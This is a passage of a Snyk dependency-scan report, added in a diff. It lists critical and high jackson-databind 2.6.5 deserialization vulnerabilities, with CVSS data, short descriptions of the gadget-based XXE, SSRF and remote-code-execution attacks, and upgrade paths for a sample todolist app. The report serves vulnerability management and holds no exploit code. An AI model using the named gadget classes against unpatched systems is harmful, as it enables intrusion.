"filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/commit/87d29af25e82a249ea15858e2d4ecbf64091db44", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2097", + "title": "GitHub Issue" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "critical", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 9.8, + "modificationTime": "2024-03-11T09:47:48.008907Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", + 
"cvssV3BaseScore": 7.5, + "modificationTime": "2024-03-11T09:48:33.930153Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:55:39.195569Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "critical", + "baseScore": 9.8, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:47:48.008907Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 7.5, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:48:33.930153Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. An attacker could perform an XML External Entity (XXE) Injection via the `JDK` classes due to an incomplete fix for the [CVE-2017-7525](https://snyk.io/vuln/SNYK-JAVA-COMFASTERXMLJACKSONCORE-31507) deserialization flaw.\r\n\r\n**Note:** This vulnerability (`CVE-2018-14720`) is not identical to `CVE-2018-12018`, `CVE-2018-14729`, `CVE-2018-14721`, `CVE-2018-14722`,`CVE-2018-12023` and `CVE-2018-11307`.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. 
_Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. 
The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.3, 2.7.9.5, 2.8.11.3, 2.9.7 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/87d29af25e82a249ea15858e2d4ecbf64091db44)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2097)\n", + "epssDetails": { + "percentile": "0.84205", + "probability": "0.01052", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2018-14720" + ], + "CWE": [ + "CWE-502" + ], + "GHSA": [ + "GHSA-x2w5-5m2g-7h5m" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2018-10-11T17:21:22.141403Z", + "functions_new": [ + { + "version": [ + "[,2.9.7)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2018-07-27T17:20:17Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": 
"2018-10-11T17:19:17Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:48:33.930153Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [ + false, + "com.fasterxml.jackson.core:jackson-databind@2.6.7.3" + ], + "isUpgradable": true, + "isPatchable": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-72450", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[,2.6.7.3)", + "[2.7.0,2.7.9.5)", + "[2.8.0,2.8.11.3)", + "[2.9.0,2.9.7)" + ] + }, + "exploit": "Unproven", + "fixedIn": [ + "2.6.7.3", + "2.7.9.5", + "2.8.11.3", + "2.9.7" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[,2.9.7)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/commit/87d29af25e82a249ea15858e2d4ecbf64091db44", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2097", + "title": "GitHub Issue" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/blob/a066415d66a6b1a4688ff0ed25695aa3a86ac130/release-notes/VERSION-2.x", + "title": "GitHub Release Notes" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "critical", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 9.8, + 
"modificationTime": "2024-03-11T09:47:48.151247Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:51:21.823657Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:55:39.120318Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "critical", + "baseScore": 9.8, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:47:48.151247Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:51:21.823657Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. An attacker could perform a Remote Code Execution attack via the `blaze-ds-opt` gadget due to an incomplete fix for the [CVE-2017-7525](https://snyk.io/vuln/SNYK-JAVA-COMFASTERXMLJACKSONCORE-31507) deserialization flaw.\r\n\r\n**Note:** This vulnerability (`CVE-2018-14719`) is not identical to `CVE-2018-12018`, `CVE-2018-14720`, `CVE-2018-14721`, `CVE-2018-14722`,`CVE-2018-12023` and `CVE-2018-11307`.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. 
_Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. 
The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.3, 2.7.9.5, 2.8.11.3, 2.9.7 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/87d29af25e82a249ea15858e2d4ecbf64091db44)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2097)\n- [GitHub Release Notes](https://github.com/FasterXML/jackson-databind/blob/a066415d66a6b1a4688ff0ed25695aa3a86ac130/release-notes/VERSION-2.x)\n", + "epssDetails": { + "percentile": "0.85805", + "probability": "0.01269", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2018-14719" + ], + "CWE": [ + "CWE-502" + ], + "GHSA": [ + "GHSA-4gq5-ch57-c2mg" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2018-10-11T17:23:45.326350Z", + "functions_new": [ + { + "version": [ + "[,2.9.7)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2018-07-27T17:22:45Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": 
"maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2018-10-11T17:22:38Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:51:21.823657Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [ + false, + "com.fasterxml.jackson.core:jackson-databind@2.6.7.3" + ], + "isUpgradable": true, + "isPatchable": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-72451", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[,2.6.7.3)", + "[2.7.0,2.7.9.5)", + "[2.8.0,2.8.11.3)", + "[2.9.0,2.9.7)" + ] + }, + "exploit": "Unproven", + "fixedIn": [ + "2.6.7.3", + "2.7.9.5", + "2.8.11.3", + "2.9.7" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[,2.9.7)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/commit/87d29af25e82a249ea15858e2d4ecbf64091db44", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2097", + "title": "GitHub Issue" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "critical", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", + "cvssV3BaseScore": 10, + "modificationTime": 
"2024-03-11T09:46:43.143163Z" + }, + { + "assigner": "Red Hat", + "severity": "medium", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:N/A:N", + "cvssV3BaseScore": 6.8, + "modificationTime": "2024-03-11T09:51:21.774444Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:57:20.565013Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "critical", + "baseScore": 10, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:46:43.143163Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:N/A:N", + "assigner": "Red Hat", + "severity": "medium", + "baseScore": 6.8, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:51:21.774444Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. A malicious user could perform a SSRF attack via the `axis2-jaxws` gadget due to an incomplete fix for the [CVE-2017-7525](https://snyk.io/vuln/SNYK-JAVA-COMFASTERXMLJACKSONCORE-31507) deserialization flaw.\r\n\r\n**Note:** This vulnerability (`CVE-2018-14721`) is not identical to `CVE-2018-12018`, `CVE-2018-14719`, `CVE-2018-14720`, `CVE-2018-14722`,`CVE-2018-12023` and `CVE-2018-11307`.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. 
_Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. 
The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.3, 2.7.9.5, 2.8.11.3, 2.9.7 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/87d29af25e82a249ea15858e2d4ecbf64091db44)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2097)\n", + "epssDetails": { + "percentile": "0.85710", + "probability": "0.01257", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2018-14721" + ], + "CWE": [ + "CWE-502" + ], + "GHSA": [ + "GHSA-9mxf-g3x6-wv74" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2018-10-11T17:25:40.161831Z", + "functions_new": [ + { + "version": [ + "[,2.9.7)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2018-07-27T17:24:46Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": 
"2018-10-11T17:24:39Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:51:21.774444Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [ + false, + "com.fasterxml.jackson.core:jackson-databind@2.6.7.3" + ], + "isUpgradable": true, + "isPatchable": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-72882", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "credit": [ + "Wuguixiong" + ], + "semver": { + "vulnerable": [ + "[,2.6.7.3)", + "[2.7.0,2.7.9.5)", + "[2.8.0,2.8.11.3)", + "[2.9.0,2.9.8)" + ] + }, + "exploit": "Unproven", + "fixedIn": [ + "2.6.7.3", + "2.7.9.5", + "2.8.11.3", + "2.9.8" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[2.0.0, 2.9.8)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/commit/42912cac4753f3f718ece875e4d486f8264c2f2b", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2186", + "title": "GitHub Issue" + }, + { + "url": "https://github.com/FasterXML/jackson/wiki/Jackson-Release-2.9.8", + "title": "GitHub Release Tag" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "critical", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 9.8, + "modificationTime": "2024-03-11T09:48:06.100058Z" 
+ }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", + "cvssV3BaseScore": 7.3, + "modificationTime": "2024-03-11T09:51:22.043196Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:58:46.690019Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "critical", + "baseScore": 9.8, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:48:06.100058Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 7.3, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:51:22.043196Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. An attacker could perform a Remote Code Execution attacks due to not blocking the `jboss-common-core ` class from polymorphic deserialization.\r\n\r\n**Note** This vulnerability (`CVE-2018-19362`) is not identical to `CVE-2018-19360` and `CVE-2018-19361`.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. 
_Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. 
The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.3, 2.7.9.5, 2.8.11.3, 2.9.8 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/42912cac4753f3f718ece875e4d486f8264c2f2b)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2186)\n- [GitHub Release Tag](https://github.com/FasterXML/jackson/wiki/Jackson-Release-2.9.8)\n", + "epssDetails": { + "percentile": "0.81590", + "probability": "0.00788", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2018-19362" + ], + "CWE": [ + "CWE-502" + ], + "GHSA": [ + "GHSA-c8hm-7hpq-7jhg" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2019-01-03T14:17:19.256477Z", + "functions_new": [ + { + "version": [ + "[2.0.0, 2.9.8)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2019-01-02T19:18:44Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": 
"com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2019-01-03T17:01:51Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:51:22.043196Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [ + false, + "com.fasterxml.jackson.core:jackson-databind@2.6.7.3" + ], + "isUpgradable": true, + "isPatchable": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-72883", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "credit": [ + "Wuguixiong" + ], + "semver": { + "vulnerable": [ + "[,2.6.7.3)", + "[2.7.0,2.7.9.5)", + "[2.8.0,2.8.11.3)", + "[2.9.0,2.9.8)" + ] + }, + "exploit": "Unproven", + "fixedIn": [ + "2.6.7.3", + "2.7.9.5", + "2.8.11.3", + "2.9.8" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[2.0.0, 2.9.8)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/commit/42912cac4753f3f718ece875e4d486f8264c2f2b", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2186", + "title": "GitHub Issue" + }, + { + "url": "https://github.com/FasterXML/jackson/wiki/Jackson-Release-2.9.8", + "title": "GitHub Release Tag" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "critical", + "cvssV3Vector": 
